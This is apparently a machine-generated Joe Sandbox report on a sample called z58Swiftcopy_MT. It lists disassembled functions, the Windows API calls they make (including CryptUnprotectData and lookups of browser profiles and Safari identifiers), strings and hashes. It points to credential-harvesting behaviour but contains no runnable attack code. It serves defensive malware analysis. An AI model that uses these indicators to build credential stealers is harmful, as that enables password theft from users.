                                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                                      • API String ID: 2929817778-1134094380
                                                                                                                                                                                                                                      • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                                      Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                                      • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                                      Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                                      • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                                      Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                                      • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                                      Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 829165378-0
                                                                                                                                                                                                                                      • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                                      Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                                      • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                                      Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                                      • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                                      Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                                      • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                                      Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                                      • API String ID: 667068680-2887671607
                                                                                                                                                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                                      Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                                                                                                      • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                                      Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
